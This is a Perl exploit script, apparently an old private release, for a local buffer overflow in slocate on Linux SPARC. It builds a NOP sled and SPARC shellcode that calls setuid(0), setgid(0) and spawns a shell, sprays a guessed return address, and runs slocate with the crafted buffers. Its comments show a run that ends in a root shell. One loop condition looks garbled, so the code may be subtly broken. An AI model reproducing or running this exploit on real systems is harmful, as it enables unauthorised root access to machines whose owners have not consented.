#!/usr/bin/perl

#slocate for linux-sparc ;) 
#this is a local sploit for local people ;) we dont want any trouble here....
#deadbeat, uk2-sec..
#PRIVATE DONT DISTRIBUTE..
#
#[danny@localhost sploits]$ perl -w slocate_sparc.pl 12
#[+]Trying addr: 0x500c4dbc
#
#sh-2.05b#id
#uid=0(root) gid=0(root) groups=0(root)


$hell = 	"\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10". 	#setuid(0)
		"\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10".	#setgid(0)
		"\x2d\x06\xd8\x9a\xac\x15\xa1\xbe\x2f\x0b\xdc\xda\x90\x0b\x80\x0e".
		"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\x6f\xf0".
		"\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10";

$ret = 0x500c4db0;
$len0 = 1024;
$len1 = 1024;
$nop = "\x80\x1c\x40\x11";
$offset = 0;

if (@ARGV == 1){
	$offset = $ARGV[0];
}
for($i=0;$i <$len0;$i++){
	$buf0 .=$nop;
}
for($i=0;$i<($len1 - length($hell)-100);$i++){
	$buf1 .=$nop;
}
$buf1 .=$hell;
print ("[+]Trying addr: 0x", sprintf('%lx', ($ret + $offset)),"\n");
$new_ret = pack('l', ($ret+$offset));
for($i += length($hell); $i ,$buf1; $i +=4){
	$buf1 .=$new_ret;
}
exec("/usr/bin/slocate -c $buf0 -r $buf1");